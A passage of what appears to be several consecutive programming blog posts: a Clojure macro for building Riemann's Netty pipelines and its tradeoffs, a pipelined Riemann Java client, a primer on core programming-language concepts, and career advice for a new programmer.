           (doto (org.jboss.netty.channel.Channels/pipeline)
             ~@forms))))))

What the hell is this thing?

Well first, it's a macro. That means it's Clojure code which runs at compile time. It's going to receive Clojure source code as its arguments, and return other code to replace itself. Since Clojure is homoiconic, its source code looks like the data structure that it is. We can use the same language to manipulate data and code. Macros define new syntax.

First comes the docstring. If we say (doc channel-pipeline-factory) at a REPL, it'll show us the documentation written here, including an example of how to use the function. ^:shared foo is metadata–the symbol foo will have a special key called :shared set on its metadata map. We use that to discriminate between handlers that can be shared safely, and those which can't.

[& names-and-exprs]

These are the arguments: a list like [name1 handler1 name2 handler2].

(assert (even? (count names-and-exprs)))

This check runs at compile time, and verifies that we passed an even number of arguments to the function. This is a simple way to validate the new syntax we're inventing.

(let [handlers (partition 2 names-and-exprs)
      shared   (filter (comp :shared meta first) handlers)

Now we assign a new variable: handlers. (partition 2 names-and-exprs) splits up the list of handlers into [name, handler] pairs, to make it easier to work with. Then we find all the handlers which are sharable between pipelines. (comp :shared meta first) composes three functions into one: take the first element of the pair (the name), get its metadata, and tell me whether it's :shared.

(let [handlers (partition 2 names-and-exprs)
      shared   (filter (comp :shared meta first) handlers)
      forms    (map (fn [[h-name h-expr]]
                      `(.addLast ~(str h-name)
                                 ~(if (:shared (meta h-name))
                                    h-name
                                    h-expr)))
                    handlers)]

Now we turn these pairs like [pb-decoder (ProtobufDecoder...)] into code like (.addLast "pb-decoder" pb-decoder) if it's shared, and (.addLast "pb-decoder" (ProtobufDecoder...)) otherwise. Where does the variable pb-decoder come from?

`(let [~@(apply concat shared)]

Ah, there it is. We take all the shared name/handler pairs and bind their names to their values as local variables. But wait–what's that backtick just before let? That's a special symbol for writing macros, and it means “Don't run this code–just construct it”. ~@ means “It's OK to run this code now–and insert whatever it returns in its place”. So the first part of the code we return will be the (let) expression binding shared names to handlers.

(reify ChannelPipelineFactory
  (getPipeline [this]
    (doto (org.jboss.netty.channel.Channels/pipeline)
      ~@forms))))))

And there's the pipeline factory itself. We construct a new pipeline, and… insert new code–the forms we generated before.

Macros give us control of syntax, and allow us to solve problems at compilation time. You don't have access to the values behind the code, but you can manipulate the symbols of the code itself absent meaning. Syntax without semantics. At compile time, Clojure invokes our macro and generates this bulky code we had before…

(let [protobuf-decoder (ProtobufDecoder. (Proto$Msg/getDefaultInstance))]
  (reify ChannelPipelineFactory
    (getPipeline [this]
      (doto (Channels/pipeline)
        (.addLast "integer-header-decoder"
                  (LengthFieldBasedFrameDecoder. Integer/MAX_VALUE 0 4 0 4))
        (.addLast "protobuf-decoder" protobuf-decoder)))))

… from a much simpler expression:

(channel-pipeline-factory
           integer-header-decoder (LengthFieldBasedFrameDecoder.
                                    Integer/MAX_VALUE 0 4 0 4)
  ^:shared protobuf-decoder       (ProtobufDecoder.
                                    (Proto$Msg/getDefaultInstance)))

Notice what's missing. We don't need to think about the pipeline class, or the name of its method. We don't have to name and manipulate variables. .addLast disappeared entirely. The protobuf handler is reused, and the length decoder is created anew every time–but they're expressed exactly the same way. We've fundamentally altered the syntax of the language–its execution order–in a controlled way. This expression is symmetric, compact, reusable, and efficient.

We've reduced the problem to a simple, minimal expression–and made that into code.

Tradeoffs

I didn't start out with this macro. Originally, Riemann used plain functions to compose pipelines. As the pipelines evolved and split into related variants, the code did too. When it came time to debug performance problems, I had a difficult time understanding what the pipelines actually looked like—composing a pipeline involved three to four layers of indirect functions across three namespaces. In order to understand the problem—and develop a solution—I needed a clear way to express pipelines themselves.

(channel-pipeline-factory
           int32-frame-decoder (int32-frame-decoder)
  ^:shared int32-frame-encoder (int32-frame-encoder)
  ^:shared executor            shared-execution-handler
  ^:shared protobuf-decoder    (protobuf-decoder)
  ^:shared protobuf-encoder    (protobuf-encoder)
  ^:shared msg-decoder         (msg-decoder)
  ^:shared msg-encoder         (msg-encoder)
  ^:shared handler             (gen-tcp-handler
                                 core channel-group tcp-handler))

In this code, the relationships between handlers are easy to understand, and making changes is simple. However, this isn't the only way to express the problem. We could provide exactly the same semantics with a plain old function taking other functions. Note that #(foo bar) is Clojure shorthand for (fn [] (foo bar)).

(channel-pipeline-factory
  :unshared :int32-frame-decoder #(int32-frame-decoder)
  :shared   :int32-frame-encoder (int32-frame-encoder)
  :shared   :executor            shared-execution-handler
  :shared   :protobuf-decoder    (protobuf-decoder)
  :shared   :protobuf-encoder    (protobuf-encoder)
  :shared   :msg-decoder         (msg-decoder)
  :shared   :msg-encoder         (msg-encoder)
  :shared   :handler             (gen-tcp-handler
                                   core channel-group tcp-handler))

In this code we've replaced bare symbols for handler names with :keywords, since symbols in normal code are resolved in the current scope. Symbols can't take metadata, so we've introduced a :shared keyword to indicate that a handler is sharable. Non-shared handlers, like int32-frame-decoder, are written as functions which are invoked every time we generate a new pipeline. And to parse the list into distinct handlers, we could either wrap each handler in a list or vector, or (as shown here), introduce a mandatory :unshared keyword such that every handler has three parts.

This is still a clean way to express a pipeline factory—and it has distinct tradeoffs. First, the macro runs at compile time. That means you can do an expensive operation once at compile time, and generate code which is quick to execute at runtime. The naive function version, by contrast, has to iterate over the handler forms every time it's invoked, identify whether it's shared or unshared, and may invoke additional functions to generate unshared handlers. If this code is performance-critical, the iteration and function invocation may not be in a form the JIT can efficiently optimize.

Macros can simplify expressing the same terms over and over again, and many library authors use them to provide domain-specific languages. For example, Riemann has a compact query syntax built on macros, which cuts out much of the boilerplate required in filtering events with functions. This expressiveness comes at a cost; macros can make it hard to reason about when code is evaluated, and break the substitution rule that a variable is equivalent to its value. This means that macros are typically more suitable for end users than for library code—and you should typically provide function equivalents to macro expressions where possible.

As a consequence of violating the substitution rule (and evaluation order in general), macros sacrifice runtime composition. Since macros operate on expressions, and not the runtime-evaluated value of those expressions, they're difficult to use whenever you want to bind a form to a variable, or pass a value at runtime. For instance, (map future ['(+ 1 2) '(+ 3 4)]) will throw a CompilerException, informing you that the compiler can't take the value of a macro. This gives rise to macro contagion: anywhere you want to invoke a macro without literal code, the calling expression must also be a macro. The power afforded by the macro system comes with a real cost: we can no longer enjoy the freedom of dynamic evaluation.

In Riemann's particular case, the performance characteristics of the (channel-pipeline-factory) macro outweigh the reusability costs—but I don't recommend making this choice lightly. Wherever possible, use a function.

Further examples

In general, any control flow can be expressed as a function which takes first-class functions as arguments. Javascript, for instance, uses explicit callback functions to express futures:

var a = 1;
var f = future(function() {
  return a + 2;
});
f.await(); // returns 3

And equivalently, in Clojure one might write:

(let [a 1
      f (future-call (fn [] (+ a 2)))] ; Or alternatively, #(+ a 2)
  (deref f)) ; returns 3

But we can erase the need for an anonymous function entirely by using a macro—like the one built in to Clojure for futures:

(let [a 1
      f (future (+ a 2))]
  (deref f)) ; returns 3

The Clojure standard library uses macros extensively for control flow. Short-circuiting (and) and (or) are macros, as are the more complex conditionals (cond) and (condp). Java's special syntax for synchronized { … } is written as the (locking) macro—and the concurrency expressions (dosync) for STM transactions, (future) for futures, (delay) for laziness, and (lazy-seq) for sequence construction are macros as well. You can write your own try/catch by using the macro system, as Slingshot does to great effect. In short, language features which would be a part of the compiler in other languages can be written and used by anyone.

Summary

Macros are a powerful tool to express complex ideas in very little code; and where used judiciously, help us reason about difficult problems in a clear way. But—just as language designers do—we must balance the expressiveness of new syntax with the complexity of its interactions. In general, I recommend you:

  • Write simple macros which are as easy to reason about as possible.
  • Use macros to express purely syntactic transformations, like control flow.
  • Choose a macro to simplify writing efficient, but awkward, code which the runtime cannot optimize for you.
  • In most other cases, prefer normal functions.

I've been putting more work into riemann-java-client recently, since it's definitely the bottleneck in performance testing Riemann itself. The existing RiemannTcpClient and RiemannRetryingTcpClient were threadsafe, but almost fully mutexed; using one essentially serialized all threads behind the client itself. For write-heavy workloads, I wanted to do better.

There are two logical optimizations I can make, in addition to choosing careful data structures, mucking with socket options, etc. The first is to bundle multiple events into a single Message, which the API supports. However, your code may not be structured in a way to efficiently bundle events, so where higher latencies are OK, the client can maintain a buffer of outbound events and flush it regularly.

The second optimization is to take advantage of request pipelining. Riemann's protocol is simple and synchronous: you send a Message over a TCP connection, and receive exactly one TCP message in response. The existing clients, however, forced you to wait n milliseconds for the message to cross the network, be processed by Riemann, and receive an acknowledgement. We can do better by pipelining requests: sending new requests before waiting for the previous responses, and matching up received messages with their corresponding requests later.

ThreadedClient does exactly that. All threads enqueue Messages into a lockfree queue, and receive Promise objects to be fulfilled when their response is available. The standard synchronous API is still available, and allows N threads to pipeline their requests together. Meanwhile, a writer thread sucks messages out of the write queue and sends them to Riemann, enqueuing written messages onto an in-flight queue. A reader thread pulls responses out of the socket and matches them to enqueued messages. Bounded queues provide backpressure, which limits the number of requests that can be in flight at any time. This allows for reasonable bounds on event loss when failures occur.
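The queue-matching idea at the heart of this design can be sketched as a toy JavaScript model—not the actual Java client; the transport object here is a hypothetical stand-in for the socket. Because the protocol is synchronous and ordered, a FIFO of pending promises pairs each response with its request:

```javascript
// A toy pipelined client. Responses arrive in the same order their
// requests were written, so a FIFO queue of pending promise resolvers
// is enough to match them back up.
class PipelinedClient {
  constructor(transport) {
    this.transport = transport; // assumed to have a write(message) method
    this.inFlight = [];         // resolvers for requests awaiting replies
  }

  // Send a message immediately; return a promise for its response.
  // Callers never wait for the round trip before sending more.
  send(message) {
    return new Promise((resolve) => {
      this.inFlight.push(resolve);   // enqueue before writing
      this.transport.write(message);
    });
  }

  // Called by the transport whenever a response arrives: the oldest
  // outstanding request gets it.
  onResponse(response) {
    const resolve = this.inFlight.shift();
    resolve(response);
  }
}
```

The real client bounds the in-flight queue, which is what provides backpressure; this sketch omits that.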

Here's what the naive client (waiting for each request's round trip) looks like on loopback:

throughput-tcp.png

And here's the same test with a RiemannThreadedClient:

throughput-threaded.png

I've done no tuning or optimization to this algorithm, and error handling is rough at best. It should perform best across real-world networks where latency is nontrivial. Even on loopback, though, I'm seeing roughly double the throughput at the cost of roughly double per-event latency.

Computer languages, like human languages, come in many forms. This post aims to give an overview of the most common programming ideas. It's meant to be read as one is learning a particular programming language, to help understand your experience in a more general context. I'm writing for conceptual learners, who delight in the underlying structure and rules of a system.

Many of these concepts have varying (and conflicting) names. I've tried to include alternates wherever possible, so you can search this post when you run into an unfamiliar word.

Syntax

Every program has two readers: the computer, and the human. Your job is to communicate clearly to both. Programs are a bit like poetry in that regard–there can be rules about the rhythm of words, how punctuation works, whether adjectives precede nouns, and so forth.

Every program is made up of expressions, organized in a tree. You can think of an expression like a sentence: it has some internal structure, and can contain other expressions as clauses.

English                                        | Javascript                    | Clojure
One plus one.                                  | 1 + 1                         | (+ 1 1)
One plus one, divided by three.                | (1 + 1) / 3                   | (/ (+ 1 1) 3)
Zoe kicks the ball.                            | zoe.kick(ball)                | (kick zoe ball)
The ball which Zoe kicks is caught by DeShawn. | deshawn.catch(zoe.kick(ball)) | (catch deshawn (kick zoe ball))

All of these expressions have the same syntax tree, but phrase it in different ways.

Every expression is equivalent to something. (+ 1 1) is equal to 2. We call 2 the value of the expression. The computer's job is to evaluate expressions, converting them gradually to values.

(/ (+ 2 4) 3)
(/ 6 3)
2

Most languages evaluate the deepest expression first. We had to evaluate (+ 2 4) before we could divide it by three. Most languages also have a way to evaluate sequences of expressions in order, usually from top to bottom. We call these “statements”, but they're really just expressions where we don't care about the return value. If expressions are clauses, statements are sentences.

cat.pounce(mouse);
1 + (3.0 / 5)

cat.pounce(mouse) is an expression, so it has a value. We just didn't do anything with it; once evaluated, we forgot about its value and moved on to the next statement. Some languages have statement terminators. Like the period in a sentence, the semicolon in javascript ends a statement. Some languages, like Ruby, put each statement on a separate line, and the semicolon is optional. Other languages use commas, or indentation.

In Lisps, statements are just a special kind of expression:

(do (pounce cat mouse) (+ 1 (/ 3.0 5)))

Every language you learn will involve picking up a new syntax, which helps you build the syntax tree the computer uses to run your program.

Values and identity

Values are the things in the world. The desk I'm typing at right now, made of wood and steel, with particular scratches on it, that's a value. My desk is an identity. Maybe this desk today, and maybe tomorrow a different desk entirely. My body, with a particular pattern of cells and fluids frozen in time, is a value. Kyle is an identity, which points to a different body every second. Identities are the fixed names for changing values. The values themselves never change, but identities do.

We say that values are immutable, because they never change. We say that identities are mutable, and their changing values over time are called state. Many languages call identities variables and values constants.

// x is a variable, an identity, and its current value is 5.
x = 5;
// Now we print x to the screen. The number five appears.
print(x);
// We can change the value x points to. Now it's six.
x = 6;
// This time, we print the number six.
print(x);

Different languages have different conventions about which things are immutable. Numbers, like 2, 1/5, and 3.1415, are always immutable. Java says strings, like "hi there", are immutable, but Ruby has mutable strings: you can change a string from one value to another. Collections like [1, 2, 3] are typically mutable, but some languages, like Haskell, Erlang, and Clojure, consider collections immutable too.

Why does mutability matter? Your program needs to talk about the real world, and in the real world things change. Identities help us understand change. At the same time, when things change, you can't rely on them any more. Someone might hide your keys, or switch out the meal you're enjoying. Immutability lets you guarantee that things won't change over time.

Functions

Functions are the verbs of programming. Given some arguments (also called parameters), they return a value. When you call a function, the computer evaluates the function's expressions, using the parameters you specify, to come up with a return value. In Clojure:

(defn fly [bird]
  (println "The" bird "is flying!"))

defn means “define function”. The function's name is fly, and it takes one argument, called bird. When called, we evaluate the println expression within. The argument bird will stand for a specific bird. In Javascript:

function fly(bird) {
  console.log("The " + bird + " is flying!");
}

There's a critical distinction between the function itself, and calling it. For example, think about the verb “fly”. It's the potentiality of flight, and we can talk about flying without actually doing it. But to really fly, we connect the verb with subjects and objects: “Fly, swan!”. fly, by itself, is a function. But calling fly with “swan” will evaluate the function's code, and return a new value.

(fly "swan")
fly("swan");

Purity

Some functions, given the same values, always do the same thing. For instance,

function add(a, b) { return a + b; }

…will always return the same sum for any pair of numbers. We say that add is pure. We know that add(1,5) is always 6, and nothing can ever change that. That means that anywhere we see add(1,5), we don't even have to run the function. We know exactly what the consequences will be, so we can speed up the program by omitting needless work. This kind of optimization happens at various levels, from the physical chip to the language itself.
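You can apply the same reasoning by hand with memoization: cache a pure function's results, and skip the work on repeated calls. A sketch—memoize here is a hypothetical helper, not a standard function, and it assumes the arguments serialize cleanly to JSON:

```javascript
// Memoize a pure function: cache results by argument, so repeated
// calls with the same inputs skip the computation entirely.
// This is only safe because the wrapped function is pure.
function memoize(f) {
  const cache = new Map();
  return function (...args) {
    const key = JSON.stringify(args); // assumes JSON-friendly arguments
    if (!cache.has(key)) {
      cache.set(key, f(...args));
    }
    return cache.get(key);
  };
}

// A counter so we can see how often the real work happens.
let calls = 0;
const add = memoize(function (a, b) {
  calls += 1;
  return a + b;
});
```

Calling add(1, 5) twice returns 6 both times, but the underlying addition runs only once.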

Impure functions, on the other hand, don't do the same thing every time. They might have side effects.

function add(a, b) {
  alert("I'm adding " + a + " and " + b);
  return a + b;
}

This function is not safe to optimize away, because it prints a message to the screen when invoked. We have to run it every time.

Where possible, programmers try to write pure functions. They're easy to test, because they always do the same thing. They're easy to reason about, because they won't interact in sneaky ways with the world when you're not looking. You can run functions in any order, or skip their evaluation when their output is never used. They're also safe to run in parallel.

Pure functions and immutable values work together, but the real world requires side effects and change. A big challenge in organizing code is controlling the use of impure functions and mutable identities, to balance performance and reasonable-ness.

Types

Types are the kinds of values in the world, the taxonomy of creatures. A given rabbit is a member of the family Leporidae, within the order Lagomorpha. By extension they are also mammals, vertebrates, and animals. The number 2 is an integer, and by extension a number. Every language has a type system, which is the taxonomy (called a “type hierarchy”) and the rules about how different types interact.

If you know the type of two objects, you can make assertions about how they work together. You can add any two numbers, so the integer 2 plus the decimal 0.5 is 2.5. But what is 2 plus an apple? Plus operates with numbers, so the expression doesn't make sense. We call this a type error.

Some languages have strict rules about the types of values and identities. You must declare the types you're working with in advance. In these statically typed languages, the computer can prove (to varying degrees) that the program is correct before it even runs.

Other languages have flexible rules about types. In a dynamically typed language, you don't have to know what kind of value you're working with until you actually evaluate an expression. Then the computer checks to see if your values can interact in that way.

Common types

You'll encounter the same types over and over again in different languages.

Integers are numbers like -1, 0, 1, 1242354, and so forth. Floats are numbers with decimal points, like 0.5, -1.999, etc. Most integers and floats only encompass a limited range of numbers before degrading in some way: 32-bit integers can only talk about numbers from -2147483648 to 2147483647. Floats have a limited number of decimal places, so they can't talk about big numbers with high precision. There are special types for large or very precise numbers. Some languages have rational types, like 2/3, which can express fractions perfectly.

Strings are lists of characters, like "hi there" or "音韻体系".

Keywords (in Ruby, symbols; in Erlang, atoms) are lightweight strings. Not every language has these. Sometimes they're written with a colon in front, like :cat. There's another sense of the word “keyword”, which refers to special words in the language like if and function. That's different.

Lists are ordered collections of things, like (6, 4, 2). Getting the first element is fast, as is going over each of the elements in order. However, getting elements towards the end of the list takes more time.

Arrays, also called vectors, are ordered collections of things where you can get the element at any given position quickly. They're often written as [6, 4, 2].

Maps, like {"cat": "meow", "dog": "woof"}, are dictionaries. Given a key, like “cat”, you can look up a corresponding value, like “meow”, quickly. You'll also see them called hashmaps, maps, associative arrays, or objects.
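In JavaScript, for instance, these collections look like this (a quick sketch; JS arrays play the role of both lists and vectors):

```javascript
// Arrays: ordered collections with fast access at any position.
const xs = [6, 4, 2];
const first = xs[0]; // the element at position 0

// Objects act as dictionaries: look up a value by key.
const sounds = { cat: "meow", dog: "woof" };
const noise = sounds["cat"];
```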

Functions are values, and they have a type. In JS, a function which adds two numbers together could be written as function(a, b) { return a + b; }.

Identities are a type, too. In fact, every type in the system has a corresponding type of identity. There's a special type for “identities which point to floats”, and a type for “identities which point to lists”. Most languages let you pretend identities just are their values.

Organizing code

One of the hardest problems in writing large systems is managing complexity. You need to reduce the problem into manageable chunks–pieces you can reason about individually.

Functions (often called methods) are your first and most broadly useful tool. Every function should do one thing, and (like everything else) should have a short, meaningful name. If your function is longer than thirty lines or so, it's too big. Find the logical borders or distinct phases and break them up into their own functions.

Above functions, languages vary in how they organize code. A common pattern is to group functions into a namespace, or module, or package. Inside the namespace, you use short names to refer to the functions. Outside the namespace, you refer to (or import, or require) functions and values from other namespaces as necessary. Think of namespaces like papers, each with citations to draw in ideas and proofs from other papers. Namespaces are usually hierarchical; they can be nested in other namespaces to break up large projects.

Object-oriented languages have the concept of classes of objects. An object is a map of keys to values, and some functions which operate on that map. The class defines what types of data are stored in an object, and defines the functions (also called methods) on the object. Each individual object (called an instance) has different data, but the same functions.

Objects and classes are typically bound up with the type system in some way. You might have an instance of the Rabbit class, which defines methods like hop. Rabbit might be a subclass of Animal, which has functions allowing rabbits and other kinds of animals to eat. The problem of organizing classes is… the subject of much debate.

Libraries are distinct collections of code geared towards solving a particular problem, like “working with geography” or “parsing natural language”. A library usually keeps its code inside a distinct namespace, so you can use it in other projects. Every language comes with a standard library built in, which defines the basic datatypes and functions everybody needs. There's usually a package manager which helps you download other libraries from the internet and integrate them into your code.

Frameworks are giant libraries which provide a skeleton for your code to fill out. Rails is a framework for serving web pages, written in the Ruby language. Frameworks take care of organizing code and solving common problems for you, so you can focus on solving a particular problem. Like skeletons, frameworks shape your code in a particular way. You can't build an elephant around a human skeleton; it's just not the right shape to support that problem. When you choose a framework, it's important to find one that's designed for the problem you're trying to solve.

Symbols

So far we've spoken in concrete terms, but solving a real problem requires abstraction. It requires names for things. In a program, you build up complex ideas from smaller pieces, by using symbols (also called identifiers or variables) to name them.

I want to make clear that symbols are a different level of a language from values. Before, we talked about real things: actual swans, the concept of flight. Now I'm talking about the words themselves, on the paper: the word “swan”, the word “fly”. In a sense, symbols are the pronouns of a language. Behind a symbol is a value. The word “she” can mean “Amelia Earhart”, or “Grace Hopper”. We infer the specific meaning of the symbol “she” from context.

In code, we need to talk about many ideas at once, and so our range of pronouns is essentially infinite.

subtotal = 5.25 + 1.40;
tax = subtotal * 0.07;
total = subtotal + tax;

5.25 is a literal value. It's the number 5.25. subtotal is a symbol, a pronoun which refers to the value of 5.25 + 1.40. In the next line, we can use subtotal to stand for 5.25 + 1.40. tax and total are symbols too. Choosing simple, descriptive symbols helps us understand the meaning of the code.

In some languages like Clojure, Erlang, and Haskell, symbols refer directly to values. subtotal can't change, because it is immutable. In languages like Ruby, Javascript, and C, symbols refer to identities, which point to values. subtotal can change in those languages, because it's an identity. It's mutable.

A symbol without a value is unbound: it represents the abstract potential for some value to come along. A symbol which has taken on a specific value is called bound. Now it stands for something. This is how functions work!

function add(a, b) { return a + b; }

In this function, a and b are unbound symbols. They have no specific value, but that's OK, because the computer doesn't need to evaluate the function yet. When we call add(3, 5), we provide values for a and b. The computer evaluates a + b with a bound to 3 and b bound to 5.

Scope

In English, “he” is usually bound to the most recent male person in the text. If you start off a book with “he devoured the mouse whole”, we have no idea who did the devouring! The scope of a symbol is the region of text where that symbol is bound to a value.

Global scope means a symbol is bound everywhere. Depending on your Bible, capitalized “He” or “She” means God, no matter where in the text it appears. We might say that “He” is a global variable.

Most modern languages also use lexical scope, which means that a symbol is bound within an expression.

function add(a, b) {
  // a and b are bound in this function expression
  if (a > 2) {
    // And also in nested expressions
    return function() {
      // For instance, this new function
      return a + b;
    }
  }
}

// However, a and b are *not* bound here!
a + b; // Wrong!

Lexical scope only applies to the code as written. Lexical symbols are not bound in other parts of the text. For instance:

function trouble() {
  // x isn't bound here
  return x + x; // Wrong!
}

function double(x) {
  // x is bound here
  return trouble();
}

double(2);

Inside double, x is bound to 2. double calls trouble–but because trouble is defined outside the scope of x, x is no longer bound. This program doesn't work.

There is another kind of scope called dynamic scope, where this program does work. Dynamic scope means a symbol is bound anywhere in an expression–and also within any function calls that expression makes. Dynamic scope means you may not know where a variable comes from, which makes it harder to reason about. It's used with restraint.
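Back under lexical scope, the earlier broken example can be fixed by defining trouble inside double, where x is bound. The inner function “closes over” x:

```javascript
// The lexical-scope fix: define the helper where x is in scope, so
// the inner function closes over x and can use it.
function double(x) {
  function trouble() {
    return x + x; // x is bound here, because trouble is written inside double
  }
  return trouble();
}
```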

If you learn an object-oriented language, you'll hear about instance variables and class variables. These symbols are available within a particular instance of a class, or shared across the whole class itself. If you think of a class definition as being a class expression, surrounding an instance expression, then class and instance variables are just lexically scoped. The language may not write it that way, though.

Wrapping up

This guide doesn't teach you how to program, but hopefully it explains why languages work the way they do. As you explore a specific language, keep an eye out for how the language writes and combines expressions. What are the basic types, and how do they work together? Look for functions, and how they're named and organized. How are the symbols named, and do they refer to identities or values? What are the rules around scope? And don't worry if this doesn't make sense just yet. As you copy existing code, make a few small changes, and gradually write your own programs from scratch, these concepts will solidify. :)

A good friend of mine from college has started teaching himself to code. He's hoping to find a job at a Bay Area startup, and asked for some help getting oriented. I started writing a response, and it got a little out of hand. Figure this might be of interest for somebody else on this path. :)

I want to give you a larger context around how this field works–there's a ton of good documentation on accomplishing specifics, but it's hard to know how it fits together, sometimes. Might be interesting for you to skim this before we meet tomorrow, so some of the concepts will be familiar.

How software is made

There are two big spheres of “technical” activity, generally referred to as “development” and “operations”. Development is about writing and refining software, and operations is about publishing and running it. In general, I think development is a little more about fluid intelligence and language, and ops is more about having broad experience and integrating disparate pieces.

In a broader sense, you'll also have product and design roles (and there's a lot of variance in how people fulfill these roles). “Product” is about understanding your problem, meeting with people who need it solved, understanding the tools at your disposal, and figuring out the shape of the solution without knowing the details. “Design” is about expressing that solution to a human being. Everything from the core ideas (what are the concepts involved and what do we call them?) to the visual and temporal layout of those ideas on the screen or in the product, to (at the most concrete) the specific colors, alignments, fonts, sounds, and images used.

Imagine a car race through the desert. The product team plans the route, finds the drivers, and decides what type of car to build. Developers design the engine, balance the vehicle, optimize chemistry, figure out the dimensions, and build the frame. Designers shape the skin and geometry, decide on colors, and position the controls so the driver has everything at hand. Operations is the ground team, who watches performance telemetry, puts out fires, and replaces broken parts or swaps out the tires for better performance on new terrain.

Designers and product folks communicate a lot about how to solve the problem in a way that makes sense to users. Developers and designers work closely together to shape the overall vehicle–designers conform the design to the user, and developers conform the design to the computer. Developers give feedback to product people about what's actually buildable, and the product team pushes developers to solve a real problem. Developers help operations understand how the car is put together internally–where the weak points are, what are the temperature limits, what kind of gas to use, how to swap out the intake manifold. Operations helps developers understand how the car is performing in the field. How did it crash, what parts need reinforcement, what's the limiting factor in speed, the oil filter is clogged with shavings, etc.

Building web sites is a great way to explore all these roles. You'll get to try a little bit of each, and get a feel for what really clicks with you.

Parts of a web site

The frontend is the part you see in a browser. It's an HTML document, which is a language for describing structured text, a CSS stylesheet, which controls positions, colors, and sizes, and Javascript code, which controls interactive components. These guys are called “frontend developers”, and usually work with (or are) a visual designer and UX designer.

The backend lives on a server. It's often broken up into several components, each solving a specific problem. One part renders the frontend and serves it to users who make requests. One part stores information in a database. One part might do work appropriate to the task, like making phone calls, computing trajectories, talking to a third-party service, etc. These folks are often called “backend engineers”.

The environment is the stuff around the backend. It's the physical computers, the operating system, storage services, the network, monitoring, emergency response, etc. A woman who maintains these services is usually called an “operations engineer”, “network administrator”, or “sysadmin” depending on specialty.

Sometimes these teams are very isolated; other times they work closely. Sometimes each person works narrowly in a single role; other times an individual will personally shepherd a feature through all these roles. It depends on how the team is organized. Startups generally have smaller teams, more tight-knit groups, and more permeable roles.

The process of coding

Development is a lot like academia. Your job is to understand a problem, develop a way to talk about it, and write an argument. Just like leading a reader through a chain of reasoning, you'll lead a computer through solving the problem. The difference is mostly in specificity: computer languages are simpler, are executed faster, and aren't as forgiving of mistakes.

First I reason about a problem. I try to phrase it in a simple way to myself. Break it into subproblems which can be solved easily. Develop a notation to talk about it, draw diagrams, walk through simple cases step by step, and look up how other people solved it. Sometimes this takes seconds, other times days.

Then I write it in code. I break it up into functions, each of which expresses a simple, individual idea. I decide on common names for the things I'm trying to discuss, and use them consistently. Then I assemble the functions together into one that solves the problem. Each function or logical group has “comments”, which explain why the solution works this way and fills in contextual gaps for humans. Code always has two readers–the computer, and the person who comes in weeks or years later to change or improve it. Your job is to express the solution clearly and efficiently to both.

Third, I test the solution. I think of example cases–if I'm testing addition, I know that 1 + 1 is 2, and -3 + 5 is 2. Good software carries with it a test suite full of these demonstrations, which verify every piece of the program.

Finally, I refine. Maybe the program wasn't formatted correctly, or I mis-spelled a word. Maybe there was a logical error. The compiler (thing that turns the language into a running program) and your tests work together to demonstrate that the solution is correct. Maybe it's correct, but it's too slow. I figure out where the problems are and redesign or optimize as necessary. This tends to be the hardest part.

The bigger picture

Writing complex software is a process of continual change. You'll go through many drafts of an essay, discovering new sources or reorganizing, reviewing by yourself or with peers. In development, we call a draft a “version”. Version control is the software that saves all our versions and connects them in a giant web. It allows us to understand the historical evolution of a document, and more importantly, to integrate changes with others.

When many people work on software, we try to break the program up into small parts with well-defined borders. Then each person can work on a separate part and not interfere with each other, so long as the borders don't change. There are a lot of ways to organize code, but in general they all aim to compartmentalize complexity so you can understand and change small pieces individually.

Imagine writing a paper with a friend. You might each take section and write it individually, then combine them into a single document. Then you'll read each other's essay and expand on it, maybe changing the wording or reordering phrases. Every time you make a distinct change you might save a new version. When your friend and you compare notes that evening, you can consider each change in isolation, deciding whether it fits with your overall theme or not. Small changes are easier to combine together, and help you understand the history of the document. When you discover a critical paragraph went missing, you can search the history to find out where it disappeared and why.

Common tools

If you want to go for a career in tech, I'd focus on building the most universally applicable skills first. They require a bit of abstract, up-front investment, but they'll help you work faster in the long run, and they're skills you'll continually reinforce. Think of this part like an intro class in finding sources, structuring an essay, etc.

First: you'll need an operating system. Honestly, most of the tools you'll be using just aren't designed for Windows. It's possible to get along, but it can be clunky. Linux is probably choice #1, and Mac OS a common second. Many Windows-based devs I know run Ubuntu in a virtual machine.

http://www.psychocats.net/ubuntu/virtualbox

Second: you need an editor, something that lets you write text. Some folks start with Textmate, Sublime Text, or Notepad++, but the best programmers I know use Emacs or (my preference) Vim. They're both powerful, but will feel awkward while you train muscle memory. You can always switch later, but folks tend to stick with their early choices. It's like driving stick vs auto. Some languages, like Objective-C or Java, need a lot of contextual information–like foreign language dictionaries, proofreaders, etc–to write well. If you work in one of those languages, you'll probably adopt a specific kind of editor, called an IDE, designed to help you.

Third: version control. There are a lot of choices, but most people and projects I work with use Git and Github. You can pick up the basics in a half hour and it'll make your life super easy as you start working on a project.

Languages

OK here's where I bring in personal opinions. Everyone's got em, ask a different person and you'll get different answers, often strongly felt. You'll start to develop these as you explore. Whatever you're using right now is The Best Language.

Javascript is a… necessary evil, and not the worst thing in the world. It's the only way to write frontend interactive code, so if you want to build interactive web pages you'll need to use it. It was thrown together quickly as a language, so its design suffers as a result. There are many special cases. Organizing code is difficult. The “things” in the language like numbers, strings, and lists can change type unexpectedly. Understand that when you write Javascript you can feel frustrated or confused and not know why; part of the reason is because the language itself is limited. It's a pidgin.

There's another class of frontend design, and that's for phones and tablets. The two big players are iOS (the iPhone and iPad), which uses a language called Objective-C, and Android, which uses a language called Java. They're roughly equivalent in complexity and language power, like French and German. I'd say they're both middling in expressiveness. They're more… finicky than writing backend code. More special cases, a little harder to get started. That said, there's nothing like the power of making a magic thing happen in the palm of your hand, and if abstract problems aren't as interesting, this can be a great niche.

On the backend, your choices are a lot wider. Lots of folks are using Ruby or Python. Like French and Spanish, they're both common, closely related, and roughly equal in performance and power. Because they're widely adopted you'll find libraries (chunks of code you can put together to solve specific problems) for almost everything.

For performance, big shops like to use Java, and to a lesser extent, C or C++. Java is reasonably fast but quite large, as a language, and slow to improve. I find it… muddy to write in. It's like not being able to use commas, and having to break every thought into a distinct simple sentence. C and its variants are extremely fast but can be more dangerous. I'd advise these as second languages.

I would avoid PHP and Perl. They're OK languages but suffer from… agglomerated cruft, and there's no particular strength to recommend them. PHP lacks design restraint and ended up a bit like English: nobody can agree on what words to use.

Lisp (remember the language you learned last time we talked?) and its variants are a bit like Latin. Very old–one of the first, actually. Radically simple. Incredibly expressive. Very few speakers, although that's changing with Clojure. Almost every other language can be viewed as a subset of Lisp. It… changes you, the way you think, in fundamental ways. Makes you a better programmer in other languages.

